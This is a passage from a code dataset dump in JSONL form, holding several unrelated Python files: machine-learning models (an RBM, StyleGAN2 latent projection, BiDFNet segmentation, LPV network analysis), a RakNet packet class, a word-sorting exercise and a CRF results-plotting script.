np.insert(lens, 0, 0, axis=0)\n return np.array([origData[int(v):int(lens[i+1])] for i,v in enumerate(lens[:-1])])\n\n\n\ndef test(data, normalize=False):\n features, lengths = data\n\n\nif __name__ == \"__main__\":\n test()\n\n","sub_path":"app/recognition/Classifier/HMM/hmm_impl/pomegranate.py","file_name":"pomegranate.py","file_ext":"py","file_size_in_byte":9827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"486980312","text":"from neuromancer.blocks import MLP\nimport torch.nn as nn\nimport torch\nimport slim\nimport scipy.linalg as LA\n\n\ndef LPV_net(fx, x):\n # nonlinearities = fx.nonlin\n x_layer = x\n x_layer_orig = x\n x_layer_A_prime = x\n W_weight = []\n W_activation = []\n W_layer = []\n i = 0\n for nlin, lin in zip(fx.nonlin, fx.linear):\n # layer-wise parameter vayring linear map\n A = lin.effective_W() # layer weight\n Ax = torch.matmul(x_layer, A) # linear transform\n if sum(Ax.squeeze()) == 0:\n lambda_h = torch.zeros(Ax.shape)\n else:\n lambda_h = nlin(Ax)/Ax # activation scaling\n lambda_h_matrix = torch.diag(lambda_h.squeeze())\n # x = lambda_h*Ax\n x_layer = torch.matmul(Ax, lambda_h_matrix)\n x_layer_orig = nlin(lin(x_layer_orig))\n\n # layer-wise parameter vayring linear map: A' = Lambda A\n A_prime = torch.matmul(A, lambda_h_matrix)\n x_layer_A_prime = torch.matmul(x_layer_A_prime, A_prime)\n print(f'layer {i+1}')\n print(x_layer_orig)\n print(x_layer)\n print(x_layer_A_prime)\n\n # network-wise parameter vayring linear map: A* = A'_L ... A'_1\n if i<1:\n A_star = A_prime\n else:\n # A* = A'A*\n A_star = torch.matmul(A_star, A_prime)\n i+=1\n # layer eigenvalues\n w_weight, v = LA.eig(lin.weight.detach().cpu().numpy().T)\n w_activation, v = LA.eig(lambda_h_matrix.detach().cpu().numpy().T)\n w_layer, v = LA.eig(A_prime.detach().cpu().numpy().T)\n W_weight.append(w_weight)\n W_activation.append(w_activation)\n W_layer.append(w_layer)\n # print(f'eigenvalues of {i}-th layer weights {w_weight}')\n # print(f'eigenvalues of {i}-th layer activations {w_activation}')\n # network-wise eigenvalues\n w_net, v = LA.eig(A_prime.detach().cpu().numpy().T)\n print(f'point-wise eigenvalues of network {w_net}')\n print(f'network forward pass vs LPV')\n print(fx(x))\n print(torch.matmul(x, A_star))\n return A_star, W_weight, W_activation, W_layer, w_net\n\n\nclass AutonomousSystem(nn.Module):\n\n def __init__(self, nx, hsizes, act, linearmap, sigmin, sigmax, real=True, bias=False):\n \"\"\"\n\n :param nx: state dimension\n :param hsizes: list of hidden state sizes (don't need to be the same as state dimension)\n :param act: callable elemntwise nonlinear function that operates on pytorch tensors\n :param linearmap: class which inherits from slim.linear.LinearBase\n :param sigmin: lower bound on eigenvalues\n :param sigmax: upper bound on eigenvalues\n \"\"\"\n super().__init__()\n self.fx = MLP(nx, nx, nonlin=act, Linear=linearmap, hsizes=hsizes, bias=bias, linargs={'sigma_min': sigmin,\n 'sigma_max': sigmax,\n 'real': real})\n\n def forward(self, x, nsim=1):\n As, wnets, wweights, wacts, wlayers = [], [], [], [], []\n for i in range(nsim):\n A_star, W_weight, W_activation, W_layer, w_net = LPV_net(self.fx, x)\n As.append(A_star)\n wnets.append(w_net)\n wweights.append(W_weight)\n wacts.append(W_activation)\n wlayers.append(W_layer)\n x = self.fx(x)\n return x, As, wnets, wweights, wacts, wlayers\n\n\nsquare_maps = [(slim.linear.maps['gershgorin'], -1.5, -1.1),\n (slim.linear.maps['gershgorin'], 0.0, 1.0),\n (slim.linear.maps['gershgorin'], .99, 1.1),\n (slim.linear.maps['gershgorin'], 1.1, 1.5),\n (slim.linear.maps['pf'], 1.0, 1.0),\n (slim.linear.maps['linear'], 1.0, 1.0)]\n\nmaps = [(slim.linear.maps['softSVD'], -1.5, -1.1),\n (slim.linear.maps['softSVD'], 0.0, 1.0),\n (slim.linear.maps['softSVD'], .99, 1.1),\n (slim.linear.maps['softSVD'], 1.1, 1.5),\n (slim.linear.maps['softSVD'], 1.0, 1.0),\n (slim.linear.maps['linear'], 1.0, 1.0)]\n\nif __name__ == '__main__':\n nx = 2\n # for nlayers in [1, 8]:\n # for hsize in [2]:\n # for linmap, sigmin, sigmax in maps:\n # for act in [nn.RelU, nn.SELU, nn.Tanh, nn.Sigmoid]:\n # system = AutonomousSystem(nx, [hsize]*nlayers, act, linmap, sigmin, sigmax)\n # print(system(torch.zeroes(1, nx)))\n\n for nlayers in [1, 8]:\n for linmap, sigmin, sigmax in square_maps:\n for real in [True, False]:\n for act in [nn.ReLU, nn.SELU, nn.Tanh, nn.Sigmoid]:\n system = AutonomousSystem(nx, [nx]*nlayers, act, linmap, sigmin, sigmax, real=real)\n print(system(torch.zeros(1, nx)))\n\n\n","sub_path":"neuromancer/train_scripts/papers/stability_l4dc/junk/autonomous_system.py","file_name":"autonomous_system.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"417188412","text":"def main():\n\tqtd_testes = int(input())\n\n\tfor i in range(qtd_testes):\n\t\tpalavras = input().split(' ')\n\n\t\tpalavras.sort(reverse=True, key=len)\n\n\t\tfor palavra in palavras:\n\t\t\tprint(palavra, end=' ')\n\n\t\tprint()\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Atividade_m/questao02.py","file_name":"questao02.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"424370888","text":"import numpy as np\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\ndef spin_config(number, n_vis):\n '''Generates a binary list from a number\n \n Arguments:\n \n :param number: any number that should be converted in a binary string\n :type vecs1: integer\n :param vecs2: maximum length of the bit string\n :type vecs2: integer\n :returns: list of bits\n '''\n spins = list(map(int, list(format(number, 'b').zfill(n_vis))))\n spins.reverse()\n return spins\n\ndef spin_list(n_vis):\n '''returns a list of all possible spin configurations for n_vis spins'''\n spins = [spin_config(number, n_vis) for number in range(2**n_vis) ]\n spins = Variable(torch.FloatTensor(spins))\n return spins\n\ndef overlapp_fct(all_spins, data, psi):\n a = 0\n for i in range(len(data)):\n a += psi[i]*torch.sqrt(rbm.probability_of_v(all_spins, data[i]))\n return a.data[0]\n\ndef outer_product(vecs1, vecs2):\n '''Computes the outer product of batches of vectors\n\n Arguments:\n\n :param vecs1: b 1-D tensors of length m\n :type vecs1: list of torch.Tensor or torch.autograd.Variable\n :param vecs2: b 1-D tensors of length n\n :type vecs2: list of torch.Tensor or torch.autograd.Variable\n :returns: torch.Tensor or torch.autograd.Variable of size (m, n)\n '''\n return torch.bmm(vecs1.unsqueeze(2), vecs2.unsqueeze(1)) #batch-matrix-matrix product\n# (b x n x m) @ (b x m x p) = (b x n x p), where b is the batch size, normal matrix multiplication\n# unsqueeze(pos) gives a new dimension at position 'pos' with size one.\n# x = [1,2,3,4], x.unsqueeze(0) has shape (1,4). x.unsqueeze(1) has shape (4,1)\n\nclass RBM(nn.Module):\n '''Test test'''\n def __init__(self,\n n_vis=10,\n n_hin=50,\n k=5, gpu = False, continuous_visible = False, continuous_hidden = False, saved_weights = None):\n super(RBM, self).__init__()\n self.gpu = gpu\n if saved_weights is None:\n self.W = nn.Parameter(torch.randn(n_hin,n_vis)*1e-2, requires_grad = True) # randomly initialize weights\n self.v_bias = nn.Parameter(torch.zeros(n_vis), requires_grad=True)\n self.h_bias = nn.Parameter(torch.zeros(n_hin), requires_grad=True)\n else:\n self.W = saved_weights[0]\n self.v_bias = saved_weights[1]\n self.h_bias = saved_weights[2]\n self.k = k\n self.n_vis = n_vis\n self.continuous_v = continuous_visible\n self.continuous_h = continuous_hidden\n\n self.W_update = self.W.clone()\n self.h_bias_update = self.h_bias.clone()\n self.v_bias_update = self.v_bias.clone()\n\n if self.gpu:\n self.W_update = self.W_update.cuda()\n self.v_bias_update = self.v_bias_update.cuda()\n self.h_bias_update = self.h_bias_update.cuda()\n\n def v_to_h(self,v): # sample h, given v\n if (self.gpu and not v.is_cuda):\n v = v.cuda()\n p_h = F.sigmoid(F.linear(v,self.W,self.h_bias))\n # p (h_j | v ) = sigma(b_j + sum_i v_i w_ij)\n sample_h = p_h.bernoulli()\n return p_h if self.continuous_h else sample_h\n\n def h_to_v(self,h): # sample v given h\n if (self.gpu and not h.is_cuda):\n h = h.cuda()\n p_v = F.sigmoid(F.linear(h,self.W.t(),self.v_bias))\n # p (v_i | h ) = sigma(a_i + sum_j h_j w_ij)\n sample_v = p_v.bernoulli()\n return p_v if self.continuous_v else sample_v\n\n def forward(self,v): # forward is pytorch standard fct that defines what happens with input data\n if (self.gpu and not v.is_cuda):\n v = v.cuda()\n h1 = self.v_to_h(v)\n h_ = h1\n for _ in range(self.k):\n v_ = self.h_to_v(h_)\n h_ = self.v_to_h(v_)\n return v,v_\n\n def free_energy(self,v): # exp( v_bias^transp*v + sum(log(1+exp(h_bias + W*v))))\n if (self.gpu and not v.is_cuda):\n v = v.cuda()\n if len(v.shape)<2: #if v is just ONE vector\n v = v.view(1, v.shape[0])\n vbias_term = v.mv(self.v_bias) # v_bias^transp*v; should give a scalar for every element of batch\n wx_b = F.linear(v,self.W,self.h_bias) # v*W^transp + h_bias\n # wx_b has dimension batch_size x v_dim\n hidden_term = wx_b.exp().log1p().sum(1) # sum indicates over which tensor index we sum\n # hidden_term has dim batch_size\n return (-hidden_term - vbias_term) # returns the free energies of all the input spins in a vector\n\n def draw_sample(self, sample_length):\n v_ = F.relu(torch.sign(Variable(torch.randn(self.n_vis))))\n for _ in range(sample_length):\n h_ = self.v_to_h(v_)\n v_ = self.h_to_v(h_)\n return v_\n\n # -------------------------------------------------------------------------\n # TO DO (for n_hidden > 150 does not work)\n # Calculate exp( log( p(v))) to avoid exploding exponentials\n # exp ( -epsilon(v) - log(Z) )\n def partition_fct(self, spins):\n return (-self.free_energy(spins)).exp().sum()\n\n def probability_of_v(self, all_spins, v):\n epsilon = (-self.free_energy(v)).exp().sum()\n Z = self.partition_fct(all_spins)\n return epsilon/Z\n\n def train(self, train_loader, lr= 0.01, weight_decay=0, momentum=0.9):\n loss_ = []\n for _, data in enumerate(train_loader):\n if self.gpu:\n self.data = data\n else:\n self.data = Variable(data.view(-1,self.n_vis))\n # Get positive phase from the data\n self.vpos = self.data\n self.hpos = self.v_to_h(self.vpos)\n # Get negative phase from the chains\n _, self.vneg = self.forward(self.vpos) # make actual k-step sampling\n self.hneg = self.v_to_h(self.vneg)\n if self.continuous_h is False:\n self.continuous_h = True\n self.hneg_probability = self.v_to_h(self.vneg)\n self.continuous_h = False\n else:\n self.hneg_probability = self.v_to_h(self.vneg)\n\n self.W_update.data *= momentum\n self.h_bias_update.data *= momentum\n self.v_bias_update.data *= momentum\n\n self.deltaW = (outer_product(self.hpos, self.vpos)- outer_product(self.hneg_probability, self.vneg)).data.mean(0)\n self.deltah = (self.hpos - self.hneg_probability).data.mean(0)\n # change hneg_prob to hneg still works, but more wiggling\n self.deltav = (self.vpos - self.vneg).data.mean(0)\n # mean averages over all batches\n if self.gpu:\n self.W_update.data += (lr * self.deltaW).cuda()\n self.h_bias_update.data += (lr * self.deltah).cuda()\n self.v_bias_update.data += (lr * self.deltav).cuda()\n else:\n self.W_update.data += (lr * self.deltaW)\n self.h_bias_update.data += (lr * self.deltah)\n self.v_bias_update.data += (lr * self.deltav)\n # Update rule is W <- W + lr*(h_0 x_0 - h_k x_k)\n # But generally it is defined as W = W - v\n # Therefore v = -lr deltaW --> v in our case is W_update\n # With momentum we get v_t+1 = m*v_t + lr deltaW\n\n self.W.data += self.W_update.data\n self.h_bias.data += self.h_bias_update.data\n self.v_bias.data += self.v_bias_update.data\n\n loss_.append(F.mse_loss(self.vneg, self.vpos).data[0])\n\n","sub_path":"tools/benchmarks/pytorch/RBM_helper.py","file_name":"RBM_helper.py","file_ext":"py","file_size_in_byte":7668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"501396196","text":"from pyraklib.constants import Constants\nfrom pyraklib.packets.base_packet import Packet\n\nclass OpenConnectionRequest1(Packet):\n pid = 0x05\n\n protocol = Constants.PROTOCOL\n mtu_size = None\n\n def _encode(self):\n self.put_byte(self.pid)\n self.put(Constants.MAGIC)\n self.put_byte(self.protocol)\n for i in range(0, self.mtu_size - 18):\n self.put_byte(0)\n\n def _decode(self):\n self.get()\n self.get(16) # magic bytes\n self.protocol = self.get()\n self.mtu_size = len(self.get(True)) + 18","sub_path":"pyraklib/packets/open_connection_request_1.py","file_name":"open_connection_request_1.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"138862248","text":"# Copyright 2021 Sony Corporation.\n# Copyright 2021 Sony Group Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport nnabla as nn\nimport nnabla.functions as F\nimport nnabla.solvers as S\n\nimport numpy as np\nimport os\nimport sys\nfrom PIL import Image\nimport subprocess as sp\nfrom tqdm import tqdm\n\nfrom .ops import *\nfrom models import *\n\nmetrics_path = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '..', '..', '..', 'utils', 'neu'))\nsys.path.append(metrics_path)\nfrom metrics.lpips.lpips import LPIPS\n\n\nclass LatentSpaceProjection(object):\n\n def __init__(self, generator, args):\n\n self.generator = generator\n\n self.solver = S.Adam()\n self.base_lr = 0.1\n\n self.img_size = 1024\n self.n_latent = 10000\n self.num_iters = 500\n self.latent_dim = self.generator.mapping_network_dim\n self.mse_c = 0.0\n self.n_c = 1e5\n\n self.lpips_distance = LPIPS(model='vgg')\n\n self.project(args)\n\n def set_lr(self, t, rampdown=0.25, rampup=0.05):\n lr_ramp = min(1, (1 - t) / rampdown)\n lr_ramp = 0.5 - 0.5 * np.cos(lr_ramp * np.pi)\n lr_ramp = lr_ramp * min(1, t / rampup)\n\n self.solver.set_learning_rate(self.base_lr * lr_ramp)\n\n def latent_noise(self, latent, strength):\n noise = F.randn(shape=latent.shape)*strength.data\n return noise + latent\n\n def regularize_noise(self, noises):\n loss = 0\n for noise in noises:\n size = noise.shape[2]\n while True:\n loss = (loss\n + F.pow_scalar(F.mean(noise * F.shift(noise,\n shifts=(0, 0, 0, 1), border_mode='reflect')), 2)\n + F.pow_scalar(F.mean(noise * F.shift(noise, shifts=(0, 0, 1, 0), border_mode='reflect')), 2))\n if size <= 8:\n break\n noise = F.reshape(noise, [-1, 1, size // 2, 2, size // 2, 2])\n noise = F.mean(noise, [3, 5])\n size //= 2\n return loss\n\n def normalize_noises(self, noises):\n for i in range(len(noises)):\n mean = np.mean(noises[i].d, keepdims=True)\n std = np.std(noises[i].d, keepdims=True)\n\n noises[i].d = (noises[i].d-mean)/std\n return noises\n\n def project(self, args):\n nn.set_auto_forward(True)\n\n # Input Image Variable\n image = Image.open(args.img_path).convert(\n \"RGB\").resize((256, 256), resample=Image.BILINEAR)\n image = np.array(image)/255.0\n image = np.transpose(image.astype(np.float32), (2, 0, 1))\n image = np.expand_dims(image, 0)\n image = (image - 0.5)/(0.5)\n image = nn.Variable.from_numpy_array(image)\n\n # Get Latent Space Mean and Std. Dev.\n # Get Noise for B network\n z = F.randn(shape=(self.n_latent, self.latent_dim)).data\n w = mapping_network(z)\n latent_mean = F.mean(w, axis=0, keepdims=True)\n latent_std = F.pow_scalar(F.mean(F.pow_scalar(w-latent_mean, 2)), 0.5)\n\n # Get Noise\n noises = [F.randn(shape=(1, 1, 4, 4)).data]\n\n for res in self.generator.resolutions[1:]:\n for _ in range(2):\n shape = (1, 1, res, res)\n noises.append(F.randn(shape=shape).data)\n\n # Prepare parameters to be optimized\n latent_in = nn.Variable.from_numpy_array(\n latent_mean.data).apply(need_grad=True)\n noises = [nn.Variable.from_numpy_array(\n n.data).apply(need_grad=True) for n in noises]\n\n constant_bc = nn.parameter.get_parameter_or_create(\n name=\"G_synthesis/4x4/Const/const\",\n shape=(1, 512, 4, 4))\n constant_bc = F.broadcast(constant_bc, (1,) + constant_bc.shape[1:])\n\n pbar = tqdm(range(self.num_iters))\n for i in pbar:\n\n t = i/self.num_iters\n self.set_lr(t)\n\n noise_strength = latent_std * 0.05 * max(0, 1 - t / 0.75) ** 2\n latent_n = self.latent_noise(latent_in, noise_strength)\n\n gen_out = self.generator.synthesis(\n [latent_n, latent_n], constant_bc, noises_in=noises)\n N, C, H, W = gen_out.shape\n factor = H//256\n gen_out = F.reshape(\n gen_out, (N, C, H//factor, factor, W//factor, factor))\n gen_out = F.mean(gen_out, axis=(3, 5))\n\n p_loss = F.sum(self.lpips_distance(image, gen_out))\n n_loss = self.regularize_noise(noises)\n mse_loss = F.mean((gen_out-image)**2)\n loss = p_loss + self.n_c*n_loss + self.mse_c*mse_loss\n\n param_dict = {'latent': latent_in}\n for i in range(len(noises)):\n param_dict[f'noise_{i}'] = noises[i]\n self.solver.zero_grad()\n self.solver.set_parameters(\n param_dict, reset=False, retain_state=True)\n\n loss.backward()\n self.solver.update()\n\n noises = self.normalize_noises(noises)\n\n pbar.set_description(f'Loss: {loss.d} P Loss: {p_loss.d}')\n\n save_generations(image, 'original.png')\n\n gen_out = self.generator.synthesis(\n [latent_n, latent_n], constant_bc, noises_in=noises)\n N, C, H, W = gen_out.shape\n factor = H//256\n gen_out = F.reshape(\n gen_out, (N, C, H//factor, factor, W//factor, factor), inplace=True)\n gen_out = F.mean(gen_out, axis=(3, 5))\n save_generations(gen_out, 'projected.png')\n\n nn.save_parameters('projection_params.h5', param_dict)\n","sub_path":"image-generation/stylegan2-training/execution/projection.py","file_name":"projection.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"523363073","text":"import re\n# import numpy as np\nimport pandas as pd\nimport glob\nimport matplotlib.pyplot as plt\n# import matplotlib.gridspec as gridspec\n\n# Repos\nTESTS = '../labeled_data/all_tests'\nRESULTS = TESTS + '/*/*/*_results.txt'\nFEATURES = TESTS + '/*/*/*_features.txt'\nTRAINING = TESTS + '/*/*/*_iterations.txt'\n\n\ndef build_feature_dictionary(files):\n '''Gets the feature sets for each test '''\n for file_in in files:\n ext = file_in.split('/')\n test_number = ext[3]\n optimization = ext[4]\n reference_number = ext[-1][0]\n text_wrapper = open(file_in, 'r')\n\ndef build_result_df(files):\n '''Builds dataframe of the result files'''\n df_list = []\n for file_in in files:\n ext = file_in.split('/')\n test_number = ext[3]\n optimization = ext[4]\n reference_number = ext[-1][0]\n text_wrapper = open(file_in, 'r')\n text_list = text_wrapper.readlines()\n split_list = [s.split() for s in text_list]\n frame = list(filter(None, split_list))\n columns = frame.pop(0)\n index = [l.pop(0) for l in frame]\n frame[4].remove('avg')\n frame[3].remove('avg')\n frame[2].remove('avg')\n\n df = pd.DataFrame(data=frame, index=index, columns=columns)\n df['opt'] = optimization\n df['reference'] = int(reference_number)\n df['test'] = test_number\n df['recall'] = df['recall'].astype('float')\n df['precision'] = df['precision'].astype('float')\n df['f1-score'] = df['f1-score'].astype('float')\n df['support'] = df['support'].astype('int32')\n df_list.append(df)\n end_frame = pd.concat(df_list, axis=0)\n return end_frame\n\n\ndef plot_results(results):\n '''Plots graphs for the results of each test set'''\n fig, ax = plt.subplots(3, 3)\n ncol = 0\n for test in results:\n nrow = 0\n for ind, obj in test.groupby('reference'):\n y_list = ['f1-score', 'precision', 'recall']\n ax1 = obj.plot.bar(x='opt', y=y_list, ax=ax[nrow, ncol])\n ax1.set_xlabel('')\n ax1.tick_params(axis='x',labelrotation=.25)\n nrow = nrow + 1\n ncol = ncol + 1\n\n ax[0, 0].\\\n set_title('Testing Phase 1: No Sentiment', fontsize='x-small')\n ax[0, 1].\\\n set_title('Testing Phase 2: Token Level Sentiment', fontsize='x-small')\n ax[0, 2].\\\n set_title('Testing Phase 3: n-level Sentiment', fontsize='x-small')\n ax[0, 0].set_ylabel('Unigram')\n a1t = ax[0, 2].twinx()\n a1t.set_ylabel('n sentiment')\n ax[1, 0].set_ylabel('Trigram')\n a2t = ax[1, 2].twinx()\n a2t.set_ylabel('n-1, n+1 sentiment')\n a3t = ax[2, 2].twinx()\n a3t.set_ylabel('n-2, n+2 sentiment')\n ax[2, 0].set_ylabel('5-gram')\n fig.suptitle('Test Results by Test Phase')\n plt.subplots_adjust(bottom=.05, top=.9)\n plt.show()\n\n\ndef build_iteration_df(files):\n '''Creates DataFrame for training information'''\n df = pd.DataFrame(columns=['Iteration', 'Time', 'Loss',\n 'Test', 'Opt', 'Reference'])\n for f_in in files:\n ext = f_in.split('/')\n test_number = ext[3]\n optimization = ext[4]\n reference_number = ext[-1][0]\n with open(f_in, 'r') as file_in:\n line = file_in.readline()\n while line:\n it = re.match('Iter.*', line)\n if it is not None:\n data_map = {}\n it = it.group(0).split()\n data_map['Iteration'] = int(it[1])\n data_map['Time'] = float(it[2].split('=')[1])\n data_map['Loss'] = float(it[3].split('=')[1])\n data_map['Test'] = test_number\n data_map['Opt'] = optimization\n data_map['Reference'] = int(reference_number)\n df = df.append(data_map, ignore_index=True)\n line = file_in.readline()\n return df\n\n\ndef plot_training(training_dataframe):\n '''Creates Training Graph'''\n fig, ax = plt.subplots(5, 3)\n col = 0\n s = ['Unigram', 'Trigram', '5-Gram']\n s2 = ['n', 'n+1, n-1', 'n+2, n-2']\n \n for j, test in training_dataframe.groupby('Test'):\n row = 0\n for ind, obj in test.groupby('Opt'):\n # print(ind)\n for jind, jobj in obj.groupby('Reference'):\n ax1 = jobj.plot(x='Iteration', y='Loss',\n ax=ax[row, col], loglog=True)\n ax1.set_xlabel('Optimization Iteration - Log Scale', fontsize='x-small')\n ax1.set_yticklabels([], minor=True)\n ax1.set_yticklabels([])\n ax1.set_yticks([], minor=True)\n ax1.set_yticks([])\n ax1.set_xticklabels([], minor=True)\n ax1.set_xticklabels([])\n ax1.set_xticks([], minor=True)\n ax1.set_xticks([])\n if col<=1:\n ax1.legend(s)\n else:\n ax1.legend(s2)\n row = row + 1\n col = col + 1\n ax[0,0].\\\n set_title('Testing Phase 1: No Sentiment', fontsize='x-small')\n ax[0,1].\\\n set_title('Testing Phase 2: Token Level Sentiment', fontsize='x-small')\n ax[0,2].\\\n set_title('Testing Phase 3: n-level Sentiment', fontsize='x-small')\n ax[0,0].\\\n set_ylabel('ap')\n ax[1,0].set_ylabel('arow')\n ax[2,0].set_ylabel('l2sgd')\n ax[3,0].set_ylabel('lbfgs')\n ax[4,0].set_ylabel('pa')\n fig.suptitle('Training Loss over Iterations by Test Phase and Algorithm (Log-Log Scale)')\n plt.subplots_adjust(bottom=.05, top=.9)\n plt.show()\n\n\n# Driver Code\ntfiles = glob.glob(TRAINING)\nrfiles = glob.glob(RESULTS)\n# ffiles = glob.glob(FEATURES)\n\n\n# TRAINING\ndft = build_iteration_df(tfiles)\nplot_training(dft)\n\n# RESULTS\n# File I/O and Pandas DataFrame\ndfr = build_result_df(rfiles)\n\n# Trim DataFrames\nt1_dfr = dfr[dfr['test'] == 'test1'].drop('macro').drop('micro').\\\n drop('o').drop('weighted').drop('support', axis=1)\n# a = [(ind, obj) for ind, obj in t1_dfr.groupby('reference')]\nt2_dfr = dfr[dfr['test'] == 'test2'].drop('macro').drop('micro').\\\n drop('o').drop('weighted').drop('support', axis=1)\nt3_dfr = dfr[dfr['test'] == 'test3'].drop('macro').drop('micro').\\\n drop('o').drop('weighted').drop('support', axis=1)\n\nall_results = [t1_dfr, t2_dfr, t3_dfr]\nplot_results(all_results)\n","sub_path":"semeval_11_2020/CRF_Final/main/vis/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"354759222","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom model.backbone.Res2Net import res2net50_v1b_26w_4s\n\n\nclass BasicConv2d(nn.Module):\n def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1 ,userelu=False):\n super(BasicConv2d, self).__init__()\n\n self.conv = nn.Conv2d(in_planes, out_planes,\n kernel_size=kernel_size, stride=stride,\n padding=padding, dilation=dilation, bias=False)\n self.bn = nn.BatchNorm2d(out_planes)\n self.relu = nn.ReLU(inplace=True)\n self.userelu =False\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n\n return x\n\n\nclass DecoderBlock(nn.Module):\n def __init__(self, in_channels, out_channels,\n kernel_size=3, stride=1, padding=1,doubleconv=True):\n super(DecoderBlock, self).__init__()\n\n self.conv1 = BasicConv2d(in_channels, in_channels, kernel_size=kernel_size,\n stride=stride, padding=padding)\n\n self.conv2 = BasicConv2d(in_channels, out_channels, kernel_size=kernel_size,\n stride=stride, padding=padding)\n self.doubleconv =doubleconv\n self.upsample = nn.Upsample(scale_factor=2, mode='bilinear')\n\n def forward(self, x):\n if self.doubleconv:\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.upsample(x)\n return x\n\n\nclass SELayer(nn.Module):\n def __init__(self, channel, reduction=16):\n super(SELayer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel, channel // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(channel // reduction, channel, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n\n\nclass AFM(nn.Module):\n def __init__(self, in_channels, all_channels):\n super(AFM, self).__init__()\n self.selayer = SELayer(all_channels)\n\n def forward(self, higerencoder, encoder, decoder):\n fuse = torch.cat([encoder, decoder, higerencoder], dim=1)\n fuse = self.selayer(fuse)\n return fuse\n\n\nclass RCM(nn.Module):\n def __init__(self, in_channels, out_channel):\n super(RCM, self).__init__()\n # self.conv1 = BasicConv2d(in_channels, in_channels, 3, padding=1)\n self.conv2 = BasicConv2d(in_channels, out_channel, 1)\n self.conv3 = BasicConv2d(out_channel, out_channel, 3, padding=1)\n\n def forward(self, encoder, afm):\n # encoder = self.conv1(encoder)\n encoder = self.conv2(encoder)\n fuse = encoder + afm\n fuse = self.conv3(fuse)\n return fuse\nclass RFB_modified(nn.Module):\n def __init__(self, in_channel, out_channel):\n super(RFB_modified, self).__init__()\n self.relu = nn.ReLU(True)\n self.branch0 = nn.Sequential(\n BasicConv2d(in_channel, out_channel, 1),\n )\n self.branch1 = nn.Sequential(\n BasicConv2d(in_channel, out_channel, 1),\n BasicConv2d(out_channel, out_channel, kernel_size=(1, 3), padding=(0, 1)),\n BasicConv2d(out_channel, out_channel, kernel_size=(3, 1), padding=(1, 0)),\n BasicConv2d(out_channel, out_channel, 3, padding=3, dilation=3)\n )\n self.branch2 = nn.Sequential(\n BasicConv2d(in_channel, out_channel, 1),\n BasicConv2d(out_channel, out_channel, kernel_size=(1, 5), padding=(0, 2)),\n BasicConv2d(out_channel, out_channel, kernel_size=(5, 1), padding=(2, 0)),\n BasicConv2d(out_channel, out_channel, 3, padding=5, dilation=5)\n )\n self.branch3 = nn.Sequential(\n BasicConv2d(in_channel, out_channel, 1),\n BasicConv2d(out_channel, out_channel, kernel_size=(1, 7), padding=(0, 3)),\n BasicConv2d(out_channel, out_channel, kernel_size=(7, 1), padding=(3, 0)),\n BasicConv2d(out_channel, out_channel, 3, padding=7, dilation=7)\n )\n self.conv_cat = BasicConv2d(4*out_channel, out_channel, 3, padding=1)\n self.conv_res = BasicConv2d(in_channel, out_channel, 1)\n\n def forward(self, x):\n x0 = self.branch0(x)\n x1 = self.branch1(x)\n x2 = self.branch2(x)\n x3 = self.branch3(x)\n x_cat = self.conv_cat(torch.cat((x0, x1, x2, x3), 1))\n\n x = self.relu(x_cat + self.conv_res(x))\n return x\n\n\nclass BiDFNet(nn.Module):\n def __init__(self, channel=64):\n super(BiDFNet, self).__init__()\n\n self.resnet = res2net50_v1b_26w_4s(pretrained=True)\n\n self.Translayer0 = RFB_modified(64, channel)\n self.Translayer1 = RFB_modified(256, channel)\n self.Translayer2 = RFB_modified(512, channel)\n self.Translayer3 = RFB_modified(1024, channel)\n self.Translayer4 = RFB_modified(2048, channel)\n\n self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)\n\n # self.decoder5 = DecoderBlock(in_channels=512, out_channels=512)\n self.decoder4 = DecoderBlock(in_channels=channel, out_channels=channel)\n self.decoder3 = DecoderBlock(in_channels=channel * 3, out_channels=channel)\n self.decoder2 = DecoderBlock(in_channels=channel * 3, out_channels=channel)\n self.decoder1 = DecoderBlock(in_channels=channel * 3, out_channels=channel)\n self.decoder0 = nn.Sequential(BasicConv2d(channel * 3, channel, 1),\n BasicConv2d(channel, channel, 1))\n self.decoder5 = nn.Sequential(BasicConv2d(channel * 2, channel, 1),\n BasicConv2d(channel, channel, 1))\n self.decoder6 = DecoderBlock(in_channels=channel * 2, out_channels=channel,doubleconv=False)\n self.decoder7 = DecoderBlock(in_channels=channel * 2, out_channels=channel,doubleconv=False)\n self.decoder8 = 